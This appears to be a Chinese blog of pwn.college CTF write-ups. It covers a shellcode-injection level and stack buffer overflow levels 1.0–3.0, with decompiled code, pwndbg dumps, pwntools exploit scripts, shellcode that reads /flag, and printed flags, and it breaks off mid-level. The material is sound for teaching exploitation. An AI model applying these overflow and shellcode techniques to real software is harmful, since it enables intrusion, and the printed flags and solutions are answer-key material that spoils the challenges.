02:0010│-030 0x7ffd5ec85bb0 —▸ 0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
03:0018│-028 0x7ffd5ec85bb8 ◂— 0x100000000
04:0020│-020 0x7ffd5ec85bc0 ◂— 0
05:0028│-018 0x7ffd5ec85bc8 ◂— 0x2710573b83e0
06:0030│-010 0x7ffd5ec85bd0 —▸ 0x7ffd5ec85d10 ◂— 0
07:0038│-008 0x7ffd5ec85bd8 —▸ 0x7ffd5ec85df0 ◂— 0
──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
 ► 0   0x614116b287c1 main+634
   1   0x71ac56a34e08
   2   0x71ac56a34ecc __libc_start_main+140
   3   0x614116b2822e _start+46
─────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni

Program received signal SIGSEGV, Segmentation fault.
0x000000002c0a3000 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
 RCX  0x71ac56b1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x2c0a3000 ◂— 0xa /* '\n' */
 RDI  0x71ac56bf8710 ◂— 0
 RSI  0x71ac56bf7643 (_IO_2_1_stdout_+131) ◂— 0xbf8710000000000a /* '\n' */
 R8   0x614119b31010 ◂— 0
 R9   7
 R10  0x614119b312a0 ◂— 0x614119b31
 R11  0x202
 R12  1
 R13  0
 R14  0x71ac573d0000 (_rtld_global) —▸ 0x71ac573d12e0 —▸ 0x614116b27000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffd5ec85be0 —▸ 0x7ffd5ec85c80 —▸ 0x7ffd5ec85ce0 ◂— 0
*RSP  0x7ffd5ec85b98 —▸ 0x614116b287c3 (main+636) ◂— lea rdi, [rip + 0xcf2]
*RIP  0x2c0a3000 ◂— 0xa /* '\n' */
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x2c0a3000    or     al, byte ptr [rax]
   0x2c0a3002    add    byte ptr [rax], al
   0x2c0a3004    add    byte ptr [rax], al
   0x2c0a3006    add    byte ptr [rax], al
   0x2c0a3008    add    byte ptr [rax], al
   0x2c0a300a    add    byte ptr [rax], al
   0x2c0a300c    add    byte ptr [rax], al
   0x2c0a300e    add    byte ptr [rax], al
   0x2c0a3010    add    byte ptr [rax], al
   0x2c0a3012    add    byte ptr [rax], al
   0x2c0a3014    add    byte ptr [rax], al
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffd5ec85b98 —▸ 0x614116b287c3 (main+636) ◂— lea rdi, [rip + 0xcf2]
01:0008│-040 0x7ffd5ec85ba0 ◂— 0
02:0010│-038 0x7ffd5ec85ba8 —▸ 0x7ffd5ec85d18 —▸ 0x7ffd5ec86c3f ◂— 0
03:0018│-030 0x7ffd5ec85bb0 —▸ 0x7ffd5ec85d08 —▸ 0x7ffd5ec86c08 ◂— 0
04:0020│-028 0x7ffd5ec85bb8 ◂— 0x100000000
05:0028│-020 0x7ffd5ec85bc0 ◂— 0
06:0030│-018 0x7ffd5ec85bc8 ◂— 0x2710573b83e0
07:0038│-010 0x7ffd5ec85bd0 —▸ 0x7ffd5ec85d10 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0       0x2c0a3000
   1   0x614116b287c3 main+636
   2   0x71ac56a34e08
   3   0x71ac56a34ecc __libc_start_main+140
   4   0x614116b2822e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

来来来，我们看看 stage_1 的 shellcode 编译出来占多少字节：

.global _start
.intel_syntax noprefix

_start:
  xor edi, edi
  xchg esi, edx
  syscall

0000000000401000 <_start>:
  401000:       31 ff                   xor    edi,edi
  401002:       87 d6                   xchg   esi,edx
  401004:       0f 05                   syscall

GG 正好 6 bytes！笑不动了哈哈哈。

现在，有了 stage_1 的辅助，stage_2 该怎么办不用多说了吧 xD

唯一有一点需要注意的就是执行 stage_2 之前应该使用 nop 填充 stage_1 所用的所有指令位，这样才能确保从正确的地方接着执行，因为 rip 的值一直在改变。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-14"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage):
    stage_1 = """
    xor edi, edi
    xchg esi, edx
    syscall
    """

    stage_2 = shellcraft.nop() * len(asm(stage_1))
    stage_2 += shellcraft.cat("/flag")

    if stage == 1:
        return asm(stage_1)
    elif stage == 2:
        return asm(stage_2)
    else:
        log.failure("Unknown stage number.")


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(1)

        send_payload(target, payload)

        payload = construct_payload(2)

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{0PaZanWijSYussIikuZaDrCAj1-.0FMzIDL5cTNxgzW}

后记

没想到时隔三天又要写后记了。这章 3 天就打完了，爽快！

~Shellcode Injection 应该是最简单的一章了，不接受反驳。~

Well. 接下来我想嗨几天，虽然不知道可以干什么，但是我清楚的知道我这个小苦逼之后的 roadmap 是刷 ROP -> FmtStr ……

Write-ups: Program Security (Memory Errors) series (Completed)

Thu, 05 Dec 2024 00:00:00 GMT

Level 1.0

Information

Category: Pwn

Description

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Write-up

分析得程序主要逻辑从 challenge 函数开始，反编译如下：

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-50h] BYREF
  int v7; // [rsp+1Ch] [rbp-34h]
  int v8; // [rsp+24h] [rbp-2Ch]
  size_t nbytes; // [rsp+28h] [rbp-28h]
  _QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF
  _QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF
  __int64 savedregs; // [rsp+50h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+58h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  v11[1] = __readfsqword(0x28u);
  buf[0] = 0LL;
  buf[1] = 0LL;
  v11[0] = 0LL;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 20);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is a \"win\" variable.");
  puts("By default, the value of this variable is zero.");
  puts("However, when this variable is non-zero, the flag will be printed.");
  puts("You can make this variable be non-zero by overflowing the input buffer.");
  printf(
    "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n",
    (char *)v11 + 4,
    20);
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the binary is *not* position independent. This means that it will be");
  puts("located at the same spot every time it is run, which means that by");
  puts("analyzing the binary (using objdump or reading this output), you can");
  puts("know the exact value that you need to overwrite the return address with.\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  nbytes = 4096LL;
  printf("You have chosen to send %lu bytes of input!\n", 4096LL);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    &buf[nbytes / 8],
    nbytes - 20);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v8 = read(0, buf, nbytes);
  if ( v8 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v8);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of the win variable is %p.\n", (char *)v11 + 4);
  printf("- the value of the win variable is 0x%x.\n", HIDWORD(v11[0]));
  putchar(10);
  if ( HIDWORD(v11[0]) )
    win();
  puts("Goodbye!");
  return 0LL;
}

注意到这里判断了 v11[0] 的高 32 bits。这时只要 v11[0] 的高 32 bits 不是 0 就都可以进入 if 内部，调用 win：

if ( HIDWORD(v11[0]) ) { win(); }

所以我们要做的就是想办法覆盖 v11[0] 的高 32 bits。

_QWORD buf[2]; // [rsp+30h] [rbp-20h] BYREF
_QWORD v11[2]; // [rsp+40h] [rbp-10h] BYREF

// ...

nbytes = 4096LL;
// ...
v8 = read(0, buf, nbytes);

这里 read 最多可以读取 4096 bytes 到 buf。但是我们的 buf 只有 16 bytes，故存在缓冲区溢出问题，导致覆盖 v11 的值。

所以我们只要先输入 16 bytes 填满 buf，再多写 5 bytes 就可以达到破坏 v11[0] 的高 32 bits 的目的。（注意 read 会把回车读进去，所以本地执行可以只输入 20 bytes）

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./binary-exploitation-first-overflow-w"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"A" * 21
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{oQdReDoKIU218v6uPGguMuFOJnt.0VO4IDL5cTNxgzW}

Level 1.1

Information

Category: Pwn

Description

This challenge is identical to its "easy" version from a security perspective, but has the following changes:

Unlike the easy version, it does not give you helpful debug output. You will have to recover this information using a debugger.
For all other "hard" versions, the source code will not be provided, and you will need to reverse-engineer the binary using your knowledge of the "easy" version as a reference. However, for this one challenge, to get you familiar with the differences between the easy and hard versions, we will provide the source code.
Some randomization is different. Buffers might have different lengths, offsets might vary, etc. You will need to reverse engineer this information from the binary!

Write-up

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  _QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREF
  int v4; // [rsp+50h] [rbp-10h]
  unsigned __int64 v5; // [rsp+58h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  v4 = 0;
  printf("Send your payload (up to %lu bytes)!\n", 4096LL);
  if ( (int)read(0, buf, 0x1000uLL) < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  if ( v4 )
    win();
  puts("Goodbye!");
  return 0LL;
}

_QWORD buf[4]; // [rsp+30h] [rbp-30h] BYREF
int v4; // [rsp+50h] [rbp-10h]

// ...

if ( (int)read(0, buf, 0x1000uLL) < 0 ) { /* ... */ }

// ...

if ( v4 ) { win(); }

由于程序根据 v4 的值来判断是否执行 win，所以只要令 v4 不为 0 即可。

注意到 buf 只有 32 bytes，但是最大可以输入 4096 bytes，导致溢出覆盖 v4 的值。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./binary-exploitation-first-overflow"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"A" * 33
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{cwWgAcBgDsBnGFTCky9i1NRqAtO.0FM5IDL5cTNxgzW}

Level 2.0

Information

Category: Pwn

Description

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-D0h] BYREF
  int v7; // [rsp+1Ch] [rbp-B4h]
  int v8; // [rsp+24h] [rbp-ACh]
  size_t nbytes; // [rsp+28h] [rbp-A8h] BYREF
  void *buf; // [rsp+30h] [rbp-A0h]
  int *v11; // [rsp+38h] [rbp-98h]
  _BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREF
  int v13; // [rsp+C0h] [rbp-10h] BYREF
  unsigned __int64 v14; // [rsp+C8h] [rbp-8h]
  __int64 savedregs; // [rsp+D0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+D8h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  v14 = __readfsqword(0x28u);
  memset(v12, 0, sizeof(v12));
  v13 = 0;
  buf = v12;
  v11 = &v13;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 127);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is a \"win\" variable.");
  puts("By default, the value of this variable is zero.");
  puts("However, if you can set variable to 0x0e530e48, the flag will be printed.");
  puts("You can change this variable by overflowing the input buffer, but keep endianness in mind!");
  printf(
    "The \"win\" variable is stored at %p, %d bytes after the start of your input buffer.\n\n",
    v11,
    (_DWORD)v11 - (_DWORD)buf);
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 127);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v8 = read(0, buf, nbytes);
  if ( v8 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v8);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of the win variable is %p.\n", v11);
  printf("- the value of the win variable is 0x%x.\n", *v11);
  putchar(10);
  if ( *v11 == 240324168 )
    win();
  puts("Goodbye!");
  return 0LL;
}

size_t nbytes; // [rsp+28h] [rbp-A8h] BYREF
void *buf; // [rsp+30h] [rbp-A0h]
int *v11; // [rsp+38h] [rbp-98h]
_BYTE v12[128]; // [rsp+40h] [rbp-90h] BYREF
int v13; // [rsp+C0h] [rbp-10h] BYREF

v13 = 0;
buf = v12;
v11 = &v13;
nbytes = 0LL;

// ...

__isoc99_scanf("%lu", &nbytes);

// ...

v8 = read(0, buf, nbytes);

// ...

if ( *v11 == 240324168 ) { win(); }

如果 v11 指向的地址的内容为 240324168 则触发 win。

注意到我们的 buf 为 128 bytes，由于最大输入长度可由我们自己自定义，因此可以溢出 buf 破坏 v13，将 v13 修改为 240324168 即可。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-2-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(128, b"A") + p64(240324168)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{w7aHpdU-9AlFvJ5GtohCFtGwF7M.ddTNzMDL5cTNxgzW}

Level 2.1

Information

Category: Pwn

Description

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Write-up

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  size_t nbytes; // [rsp+28h] [rbp-38h] BYREF
  void *buf; // [rsp+30h] [rbp-30h]
  _DWORD *v5; // [rsp+38h] [rbp-28h]
  _QWORD v6[2]; // [rsp+40h] [rbp-20h] BYREF
  _QWORD v7[2]; // [rsp+50h] [rbp-10h] BYREF

  v7[1] = __readfsqword(0x28u);
  v6[0] = 0LL;
  v6[1] = 0LL;
  v7[0] = 0LL;
  buf = v6;
  v5 = (_DWORD *)v7 + 1;
  nbytes = 0LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  if ( (int)read(0, buf, nbytes) < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  if ( *v5 == 758965894 )
    win();
  puts("Goodbye!");
  return 0LL;
}

令 v5 指向的地址处的值为 758965894 即可触发 win。

最大输入大小可由我们自定义，存在溢出问题。buf 的大小为 16 bytes，溢出后可以覆盖 v7。

v5 为指向 v7 的 _DWORD + 1 处的地址，所以覆盖 buf 后需要加一个 _DWORD 才是最终地址。

pwndbg> r
Starting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-2-1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-2-1!
###

Payload size: 1771
Send your payload (up to 1771 bytes)!

Breakpoint 1, 0x000055555555619d in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fffffffd180 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'
 RCX  0
 RDX  0x6eb
 RDI  0
 RSI  0x7fffffffd180 ◂— 0
 R8   0x75
 R9   0xfffffffc
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */
 RIP  0x55555555619d (challenge+171) ◂— call 0x555555555180
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55555555619d <challenge+171>    call   read@plt                    <read@plt>
        fd: 0 (/dev/pts/0)
        buf: 0x7fffffffd180 ◂— 0
        nbytes: 0x6eb

   0x5555555561a2 <challenge+176>    mov    dword ptr [rbp - 0x3c], eax
   0x5555555561a5 <challenge+179>    cmp    dword ptr [rbp - 0x3c], 0
   0x5555555561a9 <challenge+183>    jns    challenge+229               <challenge+229>

   0x5555555561ab <challenge+185>    call   __errno_location@plt        <__errno_location@plt>

   0x5555555561b0 <challenge+190>    mov    eax, dword ptr [rax]
   0x5555555561b2 <challenge+192>    mov    edi, eax
   0x5555555561b4 <challenge+194>    call   strerror@plt                <strerror@plt>

   0x5555555561b9 <challenge+199>    mov    rsi, rax
   0x5555555561bc <challenge+202>    lea    rdi, [rip + 0xf85]     RDI => 0x555555557148 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x5555555561c3 <challenge+209>    mov    eax, 0                 EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-050 0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'
03:0018│-048 0x7fffffffd158 ◂— 0x155559020
04:0020│-040 0x7fffffffd160 —▸ 0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— ...
05:0028│-038 0x7fffffffd168 ◂— 0x6eb
06:0030│-030 0x7fffffffd170 —▸ 0x7fffffffd180 ◂— 0
07:0038│-028 0x7fffffffd178 —▸ 0x7fffffffd194 ◂— 0xf7a9ac0000000000
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55555555619d challenge+171
   1   0x5555555562ea main+213
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4   0x55555555520e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> c
Continuing.
aaaaaaaabaaaaaaa

Breakpoint 3, 0x00005555555561d7 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x11
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'
*RCX  0x7ffff7eb0c21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x6eb
 RDI  0
 RSI  0x7fffffffd180 ◂— 'aaaaaaaabaaaaaaa\n'
 R8   0x75
 R9   0xfffffffc
 R10  0
*R11  0x246
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7fffffffd1a0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */
*RIP  0x5555555561d7 (challenge+229) ◂— mov rax, qword ptr [rbp - 0x28]
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x5555555561d7 <challenge+229>    mov    rax, qword ptr [rbp - 0x28]     RAX, [0x7fffffffd178] => 0x7fffffffd194 ◂— 0xf7a9ac0000000000
   0x5555555561db <challenge+233>    mov    eax, dword ptr [rax]            EAX, [0x7fffffffd194] => 0
   0x5555555561dd <challenge+235>    cmp    eax, 0x2d3ce686                 0x0 - 0x2d3ce686     EFLAGS => 0x293 [ CF pf AF zf SF IF df of ]
   0x5555555561e2 <challenge+240>  ✔ jne    challenge+252               <challenge+252>
    ↓
   0x5555555561ee <challenge+252>    lea    rdi, [rip + 0xf77]              RDI => 0x55555555716c ◂— 'Goodbye!'
   0x5555555561f5 <challenge+259>    call   puts@plt                    <puts@plt>

   0x5555555561fa <challenge+264>    mov    eax, 0                       EAX => 0
   0x5555555561ff <challenge+269>    mov    rcx, qword ptr [rbp - 8]
   0x555555556203 <challenge+273>    xor    rcx, qword ptr fs:[0x28]
   0x55555555620c <challenge+282>    je     challenge+289               <challenge+289>

   0x55555555620e <challenge+284>    call   __stack_chk_fail@plt        <__stack_chk_fail@plt>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 —▸ 0x555555557175 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-050 0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-2-1'
03:0018│-048 0x7fffffffd158 ◂— 0x155559020
04:0020│-040 0x7fffffffd160 ◂— 0x11ffffd1a0
05:0028│-038 0x7fffffffd168 ◂— 0x6eb
06:0030│-030 0x7fffffffd170 —▸ 0x7fffffffd180 ◂— 'aaaaaaaabaaaaaaa\n'
07:0038│-028 0x7fffffffd178 —▸ 0x7fffffffd194 ◂— 0xf7a9ac0000000000
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x5555555561d7 challenge+229
   1   0x5555555562ea main+213
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4   0x55555555520e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp-0x28
0x7fffffffd178: 0xffffd194
pwndbg> p/x 0x194-0x180
$4 = 0x14

算出来 padding 大小是 0x14。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-2-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x14, b"A") + p64(758965894)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{sZCPUpjO4U6HmvntMr91HLyNljf.dhTNzMDL5cTNxgzW}

Level 3.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag!

Write-up

###
### Welcome to ./babymem-level-3-0!
###

The challenge() function has just been launched!
Before we do anything, let's take a look at challenge()'s stack frame:
+---------------------------------+-------------------------+--------------------+
|                  Stack location |            Data (bytes) |      Data (LE int) |
+---------------------------------+-------------------------+--------------------+
| 0x00007ffd41f77580 (rsp+0x0000) | b0 75 f7 41 fd 7f 00 00 | 0x00007ffd41f775b0 |
| 0x00007ffd41f77588 (rsp+0x0008) | 68 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78768 |
| 0x00007ffd41f77590 (rsp+0x0010) | 58 87 f7 41 fd 7f 00 00 | 0x00007ffd41f78758 |
| 0x00007ffd41f77598 (rsp+0x0018) | 0b a7 02 f9 01 00 00 00 | 0x00000001f902a70b |
| 0x00007ffd41f775a0 (rsp+0x0020) | 1e 3e 40 00 00 00 00 00 | 0x0000000000403e1e |
| 0x00007ffd41f775a8 (rsp+0x0028) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775b0 (rsp+0x0030) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
| 0x00007ffd41f775b8 (rsp+0x0038) | 00 00 00 00 00 00 00 00 | 0x0000000000000000 |
